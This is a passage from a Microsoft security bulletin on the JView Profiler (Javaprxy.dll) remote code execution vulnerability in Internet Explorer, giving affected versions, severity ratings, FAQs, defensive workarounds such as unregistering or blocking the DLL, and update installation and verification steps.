with SP1 for Itanium-based Systems\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition\r\n\u2022\t\r\n\r\nMicrosoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)\r\n\r\nTested Microsoft Windows Components:\r\n\r\nAffected Components:\r\n\u2022\t\r\n\r\nJView Profiler\r\n\u2022\t\r\n\r\nInternet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 \u2013 Download the update\r\n\u2022\t\r\n\r\nInternet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, or on Microsoft Windows XP Service Pack 1 \u2013 Download the update\r\n\u2022\t\r\n\r\nInternet Explorer 6 for Microsoft Windows XP Service Pack 2 \u2013 Download the update\r\n\u2022\t\r\n\r\nInternet Explorer 6 for Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2013 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems \u2013 Download the update\r\n\u2022\t\r\n\r\nInternet Explorer 6 for Microsoft Windows Server 2003 x64 Edition \u2013 Download the update\r\n\u2022\t\r\n\r\nInternet Explorer 6 for Microsoft Windows XP Professional x64 Edition \u2013 Download the update\r\n\u2022\t\r\n\r\nInternet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition \u2013 \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n\u2022\t\r\n\r\nInternet Explorer 6 Service Pack 1 on Microsoft Windows 98, on Microsoft Windows 98 SE or on Microsoft Windows Millennium Edition \u2013 Review the FAQ section of this bulletin for details about these operating systems.\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves a newly-discovered, public vulnerability. A COM object, the JView Profiler (Javaprxy.dll), when instantiated in Internet Explorer, contains a remote code execution vulnerability that could allow an attacker to take complete control of an affected system. Since the JView Profiler COM object was not designed to be accessed through Internet Explorer, this update sets the kill bit for the JView Profiler (Javaprxy.dll) COM object. The vulnerability is documented in the \u201cVulnerability Details\u201d section of this bulletin.\r\n\r\nIf a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWe recommend that customers apply the update immediately.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tInternet Explorer 5.01 Service Pack 4\tInternet Explorer 5.5 Service Pack 2 on Windows ME\tInternet Explorer 6 Service Pack 1 (All supported operating system versions earlier than Windows Server 2003)\tInternet Explorer 6 for Windows Server 2003 and Windows Server 2003 Service Pack 1\tInternet Explorer 6 for Windows XP Service Pack 2\r\n\r\nJView Profiler Vulnerability - CAN-2005-2087\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nCritical\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\n\r\nNote The severity ratings for non-x86 operating system versions map to the x86 operating systems versions as follows:\r\n\u2022\t\r\n\r\nThe Internet Explorer 6 for Windows XP Professional x64 Edition severity rating is the same as the Internet Explorer 6 Service Pack 1 (All supported operating system versions earlier than Windows Server 2003) severity rating.\r\n\u2022\t\r\n\r\nThe Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems and Windows Server 2003 x64 Edition severity rating is the same as the Internet Explorer 6 for Windows Server 2003 severity rating.\r\nTop of sectionTop of section\r\n\t\r\nFrequently asked questions (FAQ) related to this security update\r\n\r\nIf I have applied the update available from the Microsoft Download Center for the JView Profiler advisory, do I need to apply this security update?\r\nNo. If you have applied the download available from the advisory update issued on July 5, 2005, you do not need to apply this security update.\r\n\r\nDoes this update contain any changes to functionality?\r\nNo. Since the JView Profiler COM object was not designed to be accessed through Internet Explorer, this update sets the kill bit for the JView Profiler (Javaprxy.dll) COM object. To help protect customers who have this object installed, this update prevents it from being instantiated in Internet Explorer. For more information about kill bits, see Microsoft Knowledge Base Article 240797. The class identifier (CLSID) for this object is \u201803D9F3F2-B0E3-11D2-B081-006008039BF0\u2019.\r\n\r\nHow does the extended support for Windows 98, Windows 98 Second Edition, and Windows Millennium Edition affect the release of security updates for these operating systems?\r\nMicrosoft will only release security updates for critical security issues. Non-critical security issues are not offered during this support period. For more information about the Microsoft Support Lifecycle policies for these operating systems, visit the following Web site.\r\n\r\nFor more information about severity ratings, visit the following Web site.\r\n\r\nNote Critical security updates for these operating systems may not be available at the same time as the other security updates that are included with this security bulletin. They will be made available as soon as possible following the release. When these security updates are available, you will be able to download them only from the Windows Update Web site.\r\n\r\nAre Windows 98, Windows 98 Second Edition, or Windows Millennium Edition critically affected by one or more of the vulnerabilities that are addressed in this security bulletin?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. These security updates are available for download from the Windows Update Web site. For more information about severity ratings, visit the following Web site.\r\n\r\nNote Updates for localized versions of Microsoft Windows Millennium Edition that are not supported by Windows Update are available for download at the following download locations:\r\n\u2022\t\r\n\r\nSlovenian \u2013 Download the update\r\n\u2022\t\r\n\r\nSlovakian \u2013 Download the update\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems, what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require additional support for Windows NT 4.0 SP6a must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager.\r\n\r\nFor more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nSecurity update support for Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) and Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) ended on June 30, 2005. I am still using one of these operating systems, what should I do?\r\nWith the release of Windows XP Professional x64 Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) and Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) will no longer receive security update support. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. Microsoft will continue to fully support Windows Server 2003 for Itanium-based systems, Windows XP Professional x64 Edition, and Windows Server 2003 x64 Editions for 64-bit computing requirements. Microsoft continues to license and support Windows Server 2003 Enterprise and Datacenter editions for Itanium-based systems, and the 64-bit version of SQL Server 2000 Enterprise Edition. In the future, we will expand Itanium support to Visual Studio 2005, .NET Framework 2005, and SQL Server 2005.\r\n\r\nCustomers who require additional assistance about this issue must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for information about the available migration options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) 1.2.1 to determine whether this update is required?\r\nYes. MBSA 1.2.1 will determine whether this update is required. For more information about MBSA, visit the MBSA Web site.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) 2.0 to determine whether this update is required?\r\nYes. MBSA 2.0 will determine whether this update is required. MBSA 2.0 can detect security updates for products that Microsoft Update supports. For more information about MBSA, visit the MBSA Web site.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nYes. SMS can help detect and deploy this security update. For information about SMS, visit the SMS Web site.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nJView Profiler Vulnerability - CAN-2005-2087:\r\n\r\nA remote code execution vulnerability exists in JView Profiler. An attacker could exploit the vulnerability by constructing a malicious Web page that could potentially allow remote code execution if a user visited the malicious Web site. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\t\r\nMitigating Factors for JView Profiler Vulnerability - CAN-2005-2087:\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker would have to host a Web site that contains a Web page that is used to exploit this vulnerability. An attacker would have no way to force users to visit a malicious Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's Web site.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nThe Microsoft Java Virtual Machine is not included in the following software by default:\r\n\u2022\t\r\n\r\nWindows XP Service Pack 1a and Windows XP Service Pack 2\r\n\u2022\t\r\n\r\nWindows Server 2003 and Windows Server 2003 Service Pack 1\r\n\r\nHowever, the Microsoft Java Virtual Machine may have been installed by an application. It could also be present as a result of upgrading the operating system. Customers can use the MSJVM Diagnostic Tool, which is available from the Microsoft Java Virtual Machine Support page. Customers can use this tool to perform remote and local scans to detect for the presence of MSJVM and MSJVM-related software. See the \u201cHow do I know if I have the Javaprxy.dll on my system?\u201d question in the FAQ section of this document for more information.\r\n\u2022\t\r\n\r\nThe Restricted sites zone helps reduce attacks that could try to exploit this vulnerability by preventing ActiveX controls from being used when reading HTML e-mail. However, if a user clicks on a link within an e-mail they could still be vulnerable to this issue through the Web-based attack scenario described previously.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for JView Profiler Vulnerability - CAN-2005-2087:\r\n\r\nMicrosoft has tested the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. The workarounds are mutually exclusive so users need only apply one to be secure. When a workaround reduces functionality, it is identified in the following section.\r\n\t\r\nSet Internet and Local intranet security zone settings to \u201cHigh\u201d to prompt before running ActiveX controls in these zones\r\n\r\nYou can help protect against this vulnerability by changing your settings for the Internet security zone to prompt before running ActiveX controls. You can do this by setting your browser security to High.\r\n\r\nTo raise the browsing security level in Microsoft Internet Explorer, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nUnder Security level for this zone, move the slider to High. This sets the security level for all Web sites you visit to High.\r\n\r\nNote If no slider is visible, click Default Level, and then move the slider to High.\r\n\r\nRepeat steps 1 through 3 for the Local intranet security zone by clicking on the Local intranet icon.\r\n\r\nNote Setting the level to High may cause some Web sites to work incorrectly. If you have difficulty using a Web site after you change this setting, and you are sure the site is safe to use, you can add that site to your list of trusted sites. This will allow the site to work correctly even with the security setting set to High.\r\n\r\nImpact of Workaround: User will be prompted prior to running ActiveX controls unless the Web site is in the user\u2019s list of trusted sites.\r\nTop of sectionTop of section\r\n\t\r\nConfigure Internet Explorer to prompt before running or ActiveX controls or disable ActiveX controls in the Internet and Local intranet security zone\r\n\r\nYou can help protect against this vulnerability by changing your settings to prompt before running ActiveX controls or disable ActiveX controls in the Internet and Local intranet security zone. To do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nOn the Internet Explorer Tools menu, click Internet Options.\r\n\r\n2.\r\n\t\r\n\r\nIn the Internet Options dialog box, click the Security tab, and then click the Internet icon.\r\n\r\n3.\r\n\t\r\n\r\nClick Custom Level.\r\n\r\n4.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n5.\r\n\t\r\n\r\nClick Local intranet, and then click Custom Level.\r\n\r\n6.\r\n\t\r\n\r\nUnder Settings, in the ActiveX controls and plug-ins section, under Run ActiveX controls and plug-ins, click Prompt or Disable, and then click OK.\r\n\r\n7.\r\n\t\r\n\r\nClick OK two times to return to Internet Explorer.\r\n\r\nImpact of Workaround: There are side effects to prompting before running ActiveX controls. Many Web sites that are on the Internet or on an intranet use ActiveX to provide additional functionality. For example, an online e-commerce site or banking site may use ActiveX controls to provide menus, ordering forms, or even account statements. Prompting before running ActiveX controls is a global setting that affects all Internet and intranet sites. You will be prompted frequently when you enable this workaround. For each prompt, if you feel you trust the site that you are visiting, click Yes to run ActiveX controls.\r\nTop of sectionTop of section\r\n\t\r\nUn-register the Javaprxy.dll COM Object\r\n\r\nTo un-register Javaprxy.dll, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "regsvr32 /u javaprxy.dll" (without the quotation marks), and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nA dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.\r\n\r\n3.\r\n\t\r\n\r\nClose Internet Explorer, and reopen it for the changes to take effect.\r\n\r\nImpact of Workaround: Applications that require the Microsoft Java Virtual Machine may no longer function correctly.\r\n\r\nTo undo this change, re-register Javaprxy.dll by following the above steps. Replace the text in Step 1 with \u201cregsvr32 %windir%\system32\javaprxy.dll\u201d (without the quotation marks).\r\nTop of sectionTop of section\r\n\t\r\nModify the Access Control List on Javaprxy.dll to be more restrictive\r\n\r\nTo modify the Access Control List (ACL) on Javaprxy.dll to be more restrictive, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nClick Start, click Run, type "cmd" (without the quotation marks), and then click OK.\r\n\r\n2.\r\n\t\r\n\r\nType the following command at a command prompt. Make a note of the current ACLs that are on the file (including inheritance settings) for future reference in case you have to undo this modification:\r\n\r\ncacls %windir%\system32\javaprxy.dll\r\n\r\n3.\r\n\t\r\n\r\nType the following command at a command prompt to deny the \u2018everyone\u2019 group access to this file:\r\n\r\ncacls %windir%\system32\javaprxy.dll /d everyone\r\n\r\n4.\r\n\t\r\n\r\nClose Internet Explorer, and reopen it for the changes to take effect.\r\n\r\nImpact of Workaround: Applications that require the Microsoft Java Virtual Machine may no longer function correctly.\r\nTop of sectionTop of section\r\n\t\r\nRestrict access to Javaprxy.dll in Internet Explorer by using a Software Restriction Policy\r\n\r\nTo restrict access to Javaprxy.dll in Internet Explorer on Windows XP and later versions you can create a Software Restriction Policy. To create this policy, use a registry script or create a Group Policy setting to block the loading of the Javaprxy.dll.\r\n\r\nNote Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the "Changing Keys And Values" Help topic in Registry Editor (Regedit.exe) or view the "Add and Delete Information in the Registry" and "Edit Registry Data" Help topics in Regedt32.exe.\r\n\r\nWe recommend that you back up the registry before you edit it.\r\n\r\nUse the following text to create a .reg file to un-register Javaprxy.dll in Internet Explorer. You can copy the following text, paste it into a text editor such as Notepad, and then save the file with the .reg file name extension. Run the .reg file on the vulnerable client.\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers]\r\n"TransparentEnabled"=dword:00000002\r\n\r\n[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{09687f8a-0ca9-4639-b295-a3f5b5be8fc5}]\r\n"LastModified"=hex(b):50,09,1f,b1,04,4a,c5,01\r\n"Description"="Block javaprxy.dll"\r\n"SaferFlags"=dword:00000000\r\n"ItemData"=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,\\r\n79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6a,00,61,00,76,00,61,00,70,\\r\n00,72,00,78,00,79,00,2e,00,64,00,6c,00,6c,00,00,00\r\n\r\nImpact of Workaround: Applications that require the Microsoft Java Virtual Machine may no longer function correctly.\r\nTop of sectionTop of section\r\n\t\r\nRemove the Microsoft Java Virtual Machine from your system using the Java Removal Tool\r\n\r\nCustomers can use the MSJVM Diagnostic Tool, available from the Microsoft Java Virtual Machine Support page, to perform remote and local scans to detect for the presence of MSJVM and MSJVM-related software.\r\n\r\nCustomers can then use the Java Removal Tool to permanently remove the Microsoft Java Virtual Machine from their system. For more information about how to qualify for access to the Java Removal Tool from Microsoft Product Support Services, see Microsoft Knowledge Base Article 826878.\r\n\r\nWarning: Removing the Microsoft Java Virtual Machine from your system is permanent. Microsoft cannot provide Windows operating system recovery media to you that includes the MSJVM for reinstallation. Microsoft no longer includes the MSJVM in Windows operating system products.\r\n\r\nImpact of Workaround: Applications that require the Microsoft Java Virtual Machine will no longer function correctly.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nFAQ for JView Profiler Vulnerability - CAN-2005-2087:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWhat causes the vulnerability?\r\nWhen Internet Explorer tries to instantiate the JView Profiler (Javaprxy.dll) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker could execute arbitrary code.\r\n\r\nWhat is JView Profiler?\r\nJView Profiler is a debugger interface for Microsoft Java Virtual Machine (MSJVM). For more information about the Microsoft Java Virtual Machine (MSJVM), visit the Microsoft Java Virtual Machine Web site\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system. In a Web-based attack scenario, an attacker would host a Web site that exploits this vulnerability. An attacker would have no way to force users to visit a malicious Web site. Instead, an attacker would have to persuade them to visit the Web site, typically by getting them to click a link that takes them to the attacker's site. It could also be possible to display malicious Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could host a malicious Web site that is designed to exploit this vulnerability through Internet Explorer and then persuade a user to view the Web site.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nThis vulnerability requires that a user is logged on and reading e-mail messages or by visiting Web sites for any malicious action to occur. Therefore, any systems where e-mail messages are read or where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nAre Windows 98, Windows 98 Second Edition or Windows Millennium Edition critically affected by this vulnerability?\r\nYes. Windows 98, Windows 98 Second Edition, and Windows Millennium Edition are critically affected by this vulnerability. The security updates are available from the Windows Update Web site. For more information about severity ratings, visit the following Web site.\r\n\r\nWhat does the update do?\r\nSince the JView Profiler COM object was not designed to be accessed through Internet Explorer, this update sets the kill bit for the JView Profiler (Javaprxy.dll) COM object. To help protect customers who have this object installed, this update prevents it from being instantiated in Internet Explorer. For more information about kill bits, see Microsoft Knowledge Base Article 240797. The class identifier (CLSID) for this object is \u201803D9F3F2-B0E3-11D2-B081-006008039BF0\u2019.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed?\r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CAN-2005-2087.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?\r\nYes. When the security bulletin was released, Microsoft had received information that this vulnerability was being exploited.\r\n\r\nDoes applying this security update help protect customers from the code that has been published publicly that attempts to exploit this vulnerability?\r\nYes. This security update addresses the vulnerability that is being exploited. The vulnerability that has been addressed has been assigned the Common Vulnerability and Exposure number CAN-2005-2087.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nSecurity Update Information\r\n\r\nAffected Software:\r\n\r\nFor information about the specific security update for your affected software, click the appropriate link:\r\n\t\r\nInternet Explorer 6 for Windows Server 2003 (all versions), Microsoft Windows Server 2003 x64 Edition, and for Microsoft Windows XP Professional x64 Edition\r\n\r\nPrerequisites\r\nThis security update requires Internet Explorer 6 on Windows Server 2003, on Windows Server 2003 Service Pack 1, on Microsoft Windows Server 2003 x64 Edition, or on Microsoft Windows XP Professional x64 Edition\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches.\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrites OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDoes not back up files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files. These files are located at the path that is specified in the switch.\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnables extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for the corresponding version of the Operating System:\r\n\r\nWindows Server 2003 and Windows Server 2003 Service Pack 1:\r\n\r\nWindowsserver2003-KB903235-x86-ENU.exe/quiet\r\n\r\nWindows Server 2003 x64 Edition:\r\n\r\nWindowsserver2003-KB903235-x64-ENU.exe /quiet\r\n\r\nMicrosoft Windows XP Professional x64 Edition:\r\n\r\nWindowsXP-KB903235-x64-ENU.exe /quiet\r\n\r\nNote Use of the /quiet switch will suppress all messages. This includes suppressing failure messages. Administrators should use one of the supported methods to verify the installation was successful when they use the /quiet switch. Administrators should also review the KB903235.log file for any failure messages when they use this switch.\r\n\r\nFor information about how to deploy this security update by using Software Update Services, visit the Software Update Services Web site. For information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site. This security update will also be available through the Microsoft Update Web site.\r\n\r\nRestart Requirement\r\n\r\nThis update does not require a restart.\r\n\r\nRemoval Information\r\n\r\nTo remove this update, use the Add or Remove Programs tool in Control Panel.\r\n\r\nSystem administrators can also use the Spuninst.exe utility to remove this security update. The Spuninst.exe utility is located in the %Windir%\$NTUninstallKB903235$\Spuninst folder.\r\nSupported Spuninst.exe Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\nVerifying that the Update Has Been Applied\r\n\u2022\t\r\n\r\nMicrosoft Baseline Security Analyzer\r\n\r\nTo verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. MBSA allows administrators to scan local and remote systems for missing security updates and for common security misconfigurations. For more information about MBSA, visit the Microsoft Baseline Security Analyzer Web site.\r\n\u2022\t\r\n\r\nRegistry Key Verification\r\n\r\nYou may also be able to verify the files that this security update has installed by reviewing the following registry keys.\r\n\r\nWindows Server 2003, Web Edition; Windows Server 2003, Standard Edition; Windows Server 2003, Enterprise Edition; Windows Server 2003, Datacenter Edition; Windows Small Business Server 2003; Windows Server 2003, Web Edition with SP1; Windows Server 2003, Standard Edition with SP1; Windows Server 2003, Enterprise Edition with SP1; and Windows Server 2003, Datacenter Edition with SP1:\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0}\r\n\r\nWindows Server 2003, Enterprise Edition for Itanium-based Systems; Windows Server 2003, Datacenter Edition for Itanium-based Systems; Windows Server 2003, Enterprise Edition with SP1 for Itanium-based Systems; Windows Server 2003, Datacenter Edition with SP1 for Itanium-based Systems; Windows Server 2003, Standard x64 Edition; Windows Server 2003, Enterprise x64 Edition; Windows Server 2003, Datacenter x64 Edition; and Microsoft Windows XP Professional x64 Edition:\r\n\u2022\t\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0}\r\n\u2022\t\r\n\r\nHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{03D9F3F2-B0E3-11D2-B081-006008039BF0}\r\nTop of sectionTop of section\r\n\t\r\nInternet Explorer 6 for Windows XP Service Pack 2\r\n\r\nPrerequisites\r\nThis update requires Internet Explorer 6 on Windows XP Service Pack 2. For more information, see Microsoft Knowledge Base Article 322389.\r\n\r\nInclusion in Future Service Packs:\r\nThe update for this issue will be included in a future Service Pack or Update Rollup.\r\n\r\nInstallation Information\r\n\r\nThis security update supports the following setup switches.\r\nSupported Security Update Installation Switches\r\nSwitch\tDescription\r\n\r\n/help\r\n\t\r\n\r\nDisplays the command-line options\r\nSetup Modes\t \r\n\r\n/passive\r\n\t\r\n\r\nUnattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.\r\n\r\n/quiet\r\n\t\r\n\r\nQuiet mode. This is the same as unattended mode, but no status or error messages are displayed.\r\nRestart Options\t \r\n\r\n/norestart\r\n\t\r\n\r\nDoes not restart when installation has completed\r\n\r\n/forcerestart\r\n\t\r\n\r\nRestarts the computer after installation and force other applications to close at shutdown without saving open files first.\r\n\r\n/warnrestart[:x]\r\n\t\r\n\r\nPresents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.\r\n\r\n/promptrestart\r\n\t\r\n\r\nDisplay a dialog box prompting the local user to allow a restart\r\nSpecial Options\t \r\n\r\n/overwriteoem\r\n\t\r\n\r\nOverwrites OEM files without prompting\r\n\r\n/nobackup\r\n\t\r\n\r\nDoes not back up files needed for uninstall\r\n\r\n/forceappsclose\r\n\t\r\n\r\nForces other programs to close when the computer shuts down\r\n\r\n/log:path\r\n\t\r\n\r\nAllows the redirection of installation log files\r\n\r\n/integrate:path\r\n\t\r\n\r\nIntegrates the update into the Windows source files. These files are located at the path that is specified in the switch.\r\n\r\n/extract[:path]\r\n\t\r\n\r\nExtracts files without starting the Setup program\r\n\r\n/ER\r\n\t\r\n\r\nEnables extended error reporting\r\n\r\n/verbose\r\n\t\r\n\r\nEnables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.\r\n\r\nNote You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.\r\n\r\nDeployment Information\r\n\r\nTo install the security update without any user intervention, use the following command at a command prompt for Windows XP Service Pack 2:\r\n\r\nWindowsxp-kb903235-x86-ENU.exe /quiet\r\n\r\nNote Use of the /quiet switch will suppress all messages. This includes suppressing 